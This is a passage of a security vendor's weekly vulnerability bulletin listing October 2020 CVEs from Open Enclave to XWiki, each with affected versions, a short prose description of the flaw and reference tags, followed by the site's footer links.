open_enclave — open_enclave	In Open Enclave before version 0.12.0, an information disclosure vulnerability exists when an enclave application using the syscalls provided by the sockets.edl is loaded by a malicious host application. An attacker who successfully exploited the vulnerability could read privileged data from the enclave heap across trust boundaries. To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to elevate user rights directly, but it could be used to obtain information otherwise considered confidential in an enclave, which could be used in further compromises. The issue has been addressed in version 0.12.0 and the current master branch. Users will need to to recompile their applications against the patched libraries to be protected from this vulnerability.	2020-10-14	not yet calculated	CVE-2020-15224 MISC MISC CONFIRM
openstack — blazer_dashboard	An issue was discovered in OpenStack blazar-dashboard before 1.3.1, 2.0.0, and 3.0.0. A user allowed to access the Blazar dashboard in Horizon may trigger code execution on the Horizon host as the user the Horizon service runs under (because the Python eval function is used). This may result in Horizon host unauthorized access and further compromise of the Horizon service. All setups using the Horizon dashboard with the blazar-dashboard plugin are affected.	2020-10-16	not yet calculated	CVE-2020-26943 MLIST MISC MISC MISC MISC MISC MISC CONFIRM
opensuse — powerdns_recursor	An issue has been found in PowerDNS Recursor before 4.1.18, 4.2.x before 4.2.5, and 4.3.x before 4.3.5. A remote attacker can cause the cached records for a given name to be updated to the Bogus DNSSEC validation state, instead of their actual DNSSEC Secure state, via a DNS ANY query. This results in a denial of service for installation that always validate (dnssec=validate), and for clients requesting validation when on-demand validation is enabled (dnssec=process).	2020-10-16	not yet calculated	CVE-2020-25829 SUSE CONFIRM
otrs — open_ticket_request_system	Agent names that participates in a chat conversation are revealed in certain parts of the external interface as well as in chat transcriptions inside the tickets, when system is configured to mask real agent names. This issue affects OTRS; 7.0.21 and prior versions, 8.0.6 and prior versions.	2020-10-15	not yet calculated	CVE-2020-1777 CONFIRM
overwolf — overwolf_client	In the client in Overwolf 0.149.2.30, a channel can be accessed or influenced by an actor that is not an endpoint.	2020-10-16	not yet calculated	CVE-2020-25214 MISC
pepperl_+_fuchs — comtrol_rocketlinx	Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) and ICRL-M-8RJ45/4SFP-G-DIN, ICRL-M-16RJ45/4CP-G-DIN FW 1.2.3 and below is prone to unauthenticated device administration.	2020-10-15	not yet calculated	CVE-2020-12502 CONFIRM
pepperl_+_fuchs — comtrol_rocketlinx	Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) use undocumented accounts.	2020-10-15	not yet calculated	CVE-2020-12501 CONFIRM
pepperl_+_fuchs — comtrol_rocketlinx	Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) and ICRL-M-8RJ45/4SFP-G-DIN, ICRL-M-16RJ45/4CP-G-DIN FW 1.2.3 and below is prone to multiple authenticated command injections.	2020-10-15	not yet calculated	CVE-2020-12503 CONFIRM
pepperl_+_fuchs — comtrol_rocketlinx	Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) allows unauthenticated device administration.	2020-10-15	not yet calculated	CVE-2020-12500 CONFIRM
pepperl_+_fuchs — comtrol_rocketlinx	Improper Authorization vulnerability of Pepperl+Fuchs P+F Comtrol RocketLinx ES7510-XT, ES8509-XT, ES8510-XT, ES9528-XTv2, ES7506, ES7510, ES7528, ES8508, ES8508F, ES8510, ES8510-XTE, ES9528/ES9528-XT (all versions) and ICRL-M-8RJ45/4SFP-G-DIN, ICRL-M-16RJ45/4CP-G-DIN FW 1.2.3 and below has an active TFTP-Service.	2020-10-15	not yet calculated	CVE-2020-12504 CONFIRM
phpmyadmin — phpmyadmin	An issue was discovered in SearchController in phpMyAdmin before 4.9.6 and 5.x before 5.0.3. A SQL injection vulnerability was discovered in how phpMyAdmin processes SQL statements in the search feature. An attacker could use this flaw to inject malicious SQL in to a query.	2020-10-10	not yet calculated	CVE-2020-26935 SUSE MISC
phpmyadmin — phpmyadmin	phpMyAdmin before 4.9.6 and 5.x before 5.0.3 allows XSS through the transformation feature via a crafted link.	2020-10-10	not yet calculated	CVE-2020-26934 SUSE MISC
phpredisadmin — phpredisadmin	phpRedisAdmin before 1.13.2 allows XSS via the login.php username parameter.	2020-10-16	not yet calculated	CVE-2020-27163 MISC
qemu — qemu	An issue was discovered in QEMU through 5.1.0. An out-of-bounds memory access was found in the ATI VGA device implementation. This flaw occurs in the ati_2d_blt() routine in hw/display/ati_2d.c while handling MMIO write operations through the ati_mm_write() callback. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service.	2020-10-16	not yet calculated	CVE-2020-24352 MISC MISC
qualcomm — qcmap	The QCMAP_CLI utility in the Qualcomm QCMAP software suite prior to versions released in October 2020 uses a system() call without validating the input, while handling a SetGatewayUrl() request. A local attacker with shell access can pass shell metacharacters and run arbitrary commands. If QCMAP_CLI can be run via sudo or setuid, this also allows elevating privileges to root. This version of QCMAP is used in many kinds of networking devices, primarily mobile hotspots and LTE routers.	2020-10-15	not yet calculated	CVE-2020-25859 MISC
qualcomm — qcmap	The QCMAP_Web_CLIENT binary in the Qualcomm QCMAP software suite prior to versions released in October 2020 does not validate the return value of a strstr() or strchr() call in the Tokenizer() function. An attacker who invokes the web interface with a crafted URL can crash the process, causing denial of service. This version of QCMAP is used in many kinds of networking devices, primarily mobile hotspots and LTE routers.	2020-10-15	not yet calculated	CVE-2020-25858 MISC
rapid7 — nexpose	A SQL Injection issue in Rapid7 Nexpose version prior to 6.6.49 that may have allowed an authenticated user with a low permission level to access resources & make changes they should not have been able to access.	2020-10-14	not yet calculated	CVE-2020-7383 MISC
red_hat — jboss_eap	A flaw was found in JBoss EAP, where the authentication configuration is set-up using a legacy SecurityRealm, to delegate to a legacy PicketBox SecurityDomain, and then reloaded to admin-only mode. This flaw allows an attacker to perform a complete authentication bypass by using an arbitrary user and password. The highest threat to vulnerability is to system availability.	2020-10-16	not yet calculated	CVE-2020-14299 MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b	An exploitable denial of service vulnerability exists in the ENIP Request Path Port Segment functionality of Allen-Bradley Flex IO 1794-AENT/B. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability.	2020-10-14	not yet calculated	CVE-2020-6083 MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b	An exploitable denial of service vulnerability exists in the ENIP Request Path Data Segment functionality of Allen-Bradley Flex IO 1794-AENT/B. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability.If the Simple Segment Sub-Type is supplied, the device treats the byte following as the Data Size in words. When this value represents a size greater than what remains in the packet data, the device enters a fault state where communication with the device is lost and a physical power cycle is required.	2020-10-14	not yet calculated	CVE-2020-6086 MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b	An exploitable denial of service vulnerability exists in the ENIP Request Path Data Segment functionality of Allen-Bradley Flex IO 1794-AENT/B. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability If the ANSI Extended Symbol Segment Sub-Type is supplied, the device treats the byte following as the Data Size in words. When this value represents a size greater than what remains in the packet data, the device enters a fault state where communication with the device is lost and a physical power cycle is required.	2020-10-14	not yet calculated	CVE-2020-6087 MISC
ros_comm — openrobotics	Integer Overflow or Wraparound vulnerability in the XML RPC library of OpenRobotics ros_comm communications packages allows unauthenticated network traffic to cause unexpected behavior. This issue affects: OpenRobotics ros_comm communications packages Noetic and prior versions. Fixed in https://github.com/ros/ros_comm/pull/2065.	2020-10-13	not yet calculated	CVE-2020-16124 CONFIRM
sage — dpw	An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. The search field “Kurs suchen” on the page Kurskatalog is vulnerable to Reflected XSS. If the attacker can lure a user into clicking a crafted link, he can execute arbitrary JavaScript code in the user’s browser. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware.	2020-10-16	not yet calculated	CVE-2020-26584 MISC MISC MISC
sage — dpw	An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. It allows unauthenticated users to upload JavaScript (in a file) via the expenses claiming functionality. However, to view the file, authentication is required. By exploiting this vulnerability, an attacker can persistently include arbitrary HTML or JavaScript code into the affected web page. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware.	2020-10-16	not yet calculated	CVE-2020-26583 MISC MISC MISC
samsung — samsung	Samsung Update 3.0.2.0 ~ 3.0.32.0 has a vulnerability that allows privilege escalation as commands crafted by attacker are executed while the engine deserializes the data received during inter-process communication	2020-10-12	not yet calculated	CVE-2020-7811 MISC
sap — 3d_visual_enterprise_viewer	SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated PDF file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.	2020-10-15	not yet calculated	CVE-2020-6372 MISC MISC
sap — 3d_visual_enterprise_viewer	SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated Right Hemisphere Binary (.rh) file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.	2020-10-15	not yet calculated	CVE-2020-6376 MISC MISC
sap — 3d_visual_enterprise_viewer	SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated Right Computer Graphics Metafile (.cgm) file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.	2020-10-15	not yet calculated	CVE-2020-6375 MISC MISC
sap — 3d_visual_enterprise_viewer	SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated Jupiter Tessallation(.jt) file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.	2020-10-15	not yet calculated	CVE-2020-6374 MISC MISC
sap — 3d_visual_enterprise_viewer	SAP 3D Visual Enterprise Viewer, version – 9, allows a user to open manipulated PDF file received from untrusted sources which results in crashing of the application and becoming temporarily unavailable until the user restarts the application, this is caused due to Improper Input Validation.	2020-10-15	not yet calculated	CVE-2020-6373 MISC MISC
sap — business_planning_and_consolidation	SAP Business Planning and Consolidation, versions – 750, 751, 752, 753, 754, 755, 810, 100, 200, can be abused by an attacker, allowing them to modify displayed application content without authorization, and to potentially obtain authentication information from other legitimate users, leading to Cross Site Scripting.	2020-10-15	not yet calculated	CVE-2020-6368 MISC MISC
sap — commerce_cloud	SAP Commerce Cloud versions – 1808, 1811, 1905, 2005, does not sufficiently encode user inputs, which allows an authenticated and authorized content manager to inject malicious script into several web CMS components. These can be saved and later triggered, if an affected web page is visited, resulting in Cross-Site Scripting (XSS) vulnerability.	2020-10-15	not yet calculated	CVE-2020-6272 MISC MISC
sap — commerce_cloud	SAP Commerce Cloud, versions – 1808, 1811, 1905, 2005, exposes several web applications that maintain sessions with a user. These sessions are established after the user has authenticated with username/passphrase credentials. The user can change their own passphrase, but this does not invalidate active sessions that the user may have with SAP Commerce Cloud web applications, which gives an attacker the opportunity to reuse old session credentials, resulting in Insufficient Session Expiration.	2020-10-15	not yet calculated	CVE-2020-6363 MISC MISC
sap — netweaver_application_server	SAP NetWeaver Application Server Java, versions – 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, and 7.50 allows an unauthenticated attacker to include JavaScript blocks in any web page or URL with different symbols which are otherwise not allowed. On successful exploitation an attacker can steal authentication information of the user, such as data relating to his or her current session and limitedly impact confidentiality and integrity of the application, leading to Reflected Cross Site Scripting.	2020-10-15	not yet calculated	CVE-2020-6319 MISC MISC
sap — netweaver_application_server	User enumeration vulnerability can be exploited to get a list of user accounts and personal user information can be exposed in SAP NetWeaver Application Server ABAP (POWL test application) versions – 710, 711, 730, 731, 740, 750, leading to Information Disclosure.	2020-10-15	not yet calculated	CVE-2020-6371 MISC MISC
sap — netweaver_as_java	SAP NetWeaver AS Java, versions – 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, Start Page allows an unauthenticated remote attacker to redirect users to a malicious site due to insufficient reverse tabnabbing URL validation. The attacker could execute phishing attacks to steal credentials of the victim or to redirect users to untrusted web pages containing malware or similar malicious exploits.	2020-10-15	not yet calculated	CVE-2020-6365 MISC MISC
sap — netweaver_enterprise_portal	SAP NetWeaver Enterprise Portal (Fiori Framework Page) versions – 7.50, 7.31, 7.40, does not sufficiently encode user-controlled inputs and allows an attacker on a valid session to create an XSS that will be both reflected immediately and also be persisted and returned in further access to the system, resulting in Cross Site Scripting.	2020-10-15	not yet calculated	CVE-2020-6323 MISC MISC
sap — soulution_manager_and_sap_focused_run	SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an attacker to modify a cookie in a way that OS commands can be executed and potentially gain control over the host running the CA Introscope Enterprise Manager,leading to Code Injection. With this, the attacker is able to read and modify all system files and also impact system availability.	2020-10-15	not yet calculated	CVE-2020-6364 MISC MISC
siport — mp	A vulnerability has been identified in SIPORT MP (All versions < 3.2.1). Vulnerable versions of the device could allow an authenticated attacker to impersonate other users of the system and perform (potentially administrative) actions on behalf of those users if the single sign-on feature (“Allow logon without password”) is enabled.	2020-10-15	not yet calculated	CVE-2020-7591 MISC
snyk — prototype_pollution	The package mathjs before 7.5.1 are vulnerable to Prototype Pollution via the deepExtend function that runs upon configuration updates.	2020-10-13	not yet calculated	CVE-2020-7743 MISC MISC MISC MISC MISC MISC
sonatype — nexus_repository_manager	A Directory Traversal issue was discovered in Sonatype Nexus Repository Manager 2.x before 2.14.19. A user that requests a crafted path can traverse up the file system to get access to content on disk (that the user running nxrm also has access to).	2020-10-12	not yet calculated	CVE-2020-15012 CONFIRM
sonicos — sonicos	A buffer overflow vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service and leads to firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5137 CONFIRM
sonicos — sonicos	A vulnerability in SonicOS allows a remote unauthenticated attacker to brute force Virtual Assist ticket ID in the firewall SSLVPN service. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5141 CONFIRM
sonicos — sonicos	A Heap Overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service and leads to SonicOS crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5138 CONFIRM
sonicos — sonicos	A vulnerability in SonicOS allows an authenticated attacker to cause out-of-bound invalid file reference leads to a firewall crash. This vulnerability affected SonicOS Gen 6 version 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5134 CONFIRM
sonicos — sonicos	A vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service due to buffer overflow, which leads to a firewall crash. This vulnerability affected SonicOS Gen 6 version 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5133 CONFIRM
sonicos — sonicos	A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5135 CONFIRM
sonicos — sonicos	A buffer overflow vulnerability in SonicOS allows an authenticated attacker to cause Denial of Service (DoS) in the SSL-VPN and virtual assist portal, which leads to a firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5136 CONFIRM
sonicos — sonicos	A vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service by sending a malicious HTTP request that leads to memory addresses leak. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5140 CONFIRM
sonicos — sonicos	A vulnerability in SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS) due to the release of Invalid pointer and leads to a firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5139 CONFIRM
sonicos — sonicos	SonicOS SSLVPN login page allows a remote unauthenticated attacker to perform firewall management administrator username enumeration based on the server responses. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5143 CONFIRM
sonicos — sonicos	A stored cross-site scripting (XSS) vulnerability exists in the SonicOS SSLVPN web interface. A remote unauthenticated attacker is able to store and potentially execute arbitrary JavaScript code in the firewall SSLVPN portal. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0.	2020-10-12	not yet calculated	CVE-2020-5142 CONFIRM
sopel — channelmgnt	In the Channelmgnt plug-in for Sopel (a Python IRC bot) before version 1.0.3, malicious users are able to op/voice and take over a channel. This is an ACL bypass vulnerability. This plugin is bundled with MirahezeBot-Plugins with versions from 9.0.0 and less than 9.0.2 affected. Version 9.0.2 includes 1.0.3 of channelmgnt, and thus is safe from this vulnerability. See referenced GHSA-23pc-4339-95vg.	2020-10-13	not yet calculated	CVE-2020-15251 MISC MISC CONFIRM MISC MISC MISC
sylabs — singularity	Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within `unsquashfs`, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesystem. The extraction occurs automatically for unprivileged (either installation or with `allow setuid = no`) run of Singularity when a user attempt to run an image which is a local SIF image or a single file containing a squashfs filesystem and is coming from remote sources `library://` or `shub://`. Image build is also impacted in a more serious way as it can be used by a root user, allowing an attacker to overwrite/create files leading to a system compromise, so far bootstrap methods `library`, `shub` and `localimage` are triggering the squashfs extraction. This issue is addressed in Singularity 3.6.4. All users are advised to upgrade to 3.6.4 especially if they use Singularity mainly for building image as root user. There is no solid workaround except to temporary avoid to use unprivileged mode with single file images in favor of sandbox images instead. Regarding image build, temporary avoid to build from `library` and `shub` sources and as much as possible use `–fakeroot` or a VM for that.	2020-10-14	not yet calculated	CVE-2020-15229 MISC MISC MISC CONFIRM
telegram — telegram_desktop	Telegram Desktop through 2.4.3 does not require passcode entry upon pushing the Export key within the Export Telegram Data wizard. The threat model is a victim who has voluntarily opened Export Wizard but is then distracted. An attacker then approaches the unattended desktop and pushes the Export key. This attacker may consequently gain access to all chat conversation and media files.	2020-10-14	not yet calculated	CVE-2020-25824 MISC MISC MISC
trend_micro — antivirus_for_mac	Trend Micro Antivirus for Mac 2020 (Consumer) contains a vulnerability in the product that occurs when a webserver is started that implements an API with several properties that can be read and written to allowing the attacker to gather and modify sensitive product and user data. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.	2020-10-14	not yet calculated	CVE-2020-27013 N/A N/A
trend_micro — antivirus_for_mac_2020	Trend Micro Antivirus for Mac 2020 (Consumer) has a vulnerability in a specific kernel extension where an attacker could supply a kernel pointer and leak several bytes of memory. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.	2020-10-14	not yet calculated	CVE-2020-25778 N/A N/A
trend_micro — antivirus_for_mac_2020	Trend Micro Antivirus for Mac 2020 (Consumer) is vulnerable to a specific kernel extension request attack where an attacker could bypass the Web Threat Protection feature of the product. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.	2020-10-14	not yet calculated	CVE-2020-25777 N/A N/A
trend_micro — antivirus_for_mac_2020	Trend Micro Antivirus for Mac 2020 (Consumer) has a vulnerability in which a Internationalized Domain Name homograph attack (Puny-code) could be used to add a malicious website to the approved websites list of Trend Micro Antivirus for Mac to bypass the web threat protection feature.	2020-10-13	not yet calculated	CVE-2020-25779 MISC
uniper_networks — mist_cloud_ui	When Security Assertion Markup Language (SAML) authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly process invalid authentication certificates which could allow a malicious network-based user to access unauthorized data. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020.	2020-10-16	not yet calculated	CVE-2020-1675 CONFIRM
uniper_networks — mist_cloud_ui	When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle child elements in SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020.	2020-10-16	not yet calculated	CVE-2020-1677 CONFIRM
united_planet — united_planet	Cross-site scripting (XSS) vulnerability in the search functionality in United Planet Intrexx Professional before 20.03 allows remote attackers to inject arbitrary web script or HTML via the request parameter.	2020-10-14	not yet calculated	CVE-2020-24188 MISC
veritas — aptare	Veritas APTARE versions prior to 10.5 included code that bypassed the normal login process when specific authentication credentials were provided to the server. An unauthenticated user could login to the application and gain access to the data and functionality accessible to the targeted user account.	2020-10-15	not yet calculated	CVE-2020-27157 MISC
veritas — aptare	Veritas APTARE versions prior to 10.5 did not perform adequate authorization checks. This vulnerability could allow for remote code execution by an unauthenticated user.	2020-10-15	not yet calculated	CVE-2020-27156 MISC
vm-superio — vm-superio	In vm-superio before 0.1.1, the serial console FIFO can grow to unlimited memory usage when data is sent to the input source (i.e., standard input). This behavior cannot be reproduced from the guest side. When no rate limiting is in place, the host can be subject to memory pressure, impacting all other VMs running on the same host.	2020-10-16	not yet calculated	CVE-2020-27173 MISC MISC
vmware — horizon_client	VMware Horizon Client for Windows (5.x before 5.5.0) contains a denial-of-service vulnerability due to a file system access control issue during install time. Successful exploitation of this issue may allow an attacker to overwrite certain admin privileged files through a symbolic link attack at install time. This will result into a denial-of-service condition on the machine where Horizon Client for Windows is installed.	2020-10-16	not yet calculated	CVE-2020-3991 MISC
windows — application_compatibility_client_library	An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16920.	2020-10-16	not yet calculated	CVE-2020-16876 MISC
windows — remote_desktop_service	A denial of service vulnerability exists in Windows Remote Desktop Service when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Service Denial of Service Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16863 MISC
windows –visual_studio_code	A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads a Jupyter notebook file, aka ‘Visual Studio Code Python Extension Remote Code Execution Vulnerability’.	2020-10-16	not yet calculated	CVE-2020-16977 MISC
wordpress — wordpress	Testimonial Rotator WordPress Plugin 3.0.2 is affected by Cross Site Scripting (XSS) in /wp-admin/post.php. If a user intercepts a request and inserts a payload in “cite” parameter, the payload will be stored in the database.	2020-10-16	not yet calculated	CVE-2020-26672 MISC
xwiki — xwiki	In XWiki before version 12.5 and 11.10.6, any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution. This is patched in XWiki 12.5 and XWiki 11.10.6.	2020-10-16	not yet calculated	CVE-2020-15252 CONFIRM MISC MISC

This product is provided subject to this Notification and this Privacy & Use policy.

Managed Security Services

Cyber Threat Intelligence

iDNA

SiON

About Us

Leadership

Advisors

Cyber Security Assessment

SOC Cost Calculator

Request a Dark Web Report

Cyber Security Threat Alerts

What is Incident Response?

SOC 2 Compliance

Cyber Security Definitions and Terminology

Cyber Security Jobs

Blog

Podcast

Instagram

LinkedIn

Twitter

High Vulnerabilities

Medium Vulnerabilities

Low Vulnerabilities

Severity Not Yet Assigned

High Vulnerabilities

Medium Vulnerabilities

Low Vulnerabilities

Severity Not Yet Assigned

Company

Our services

Resources

Partners

Cyber news

Weekly Newsletter

Subscribe to our weekly newsletter on cyber news and best practices!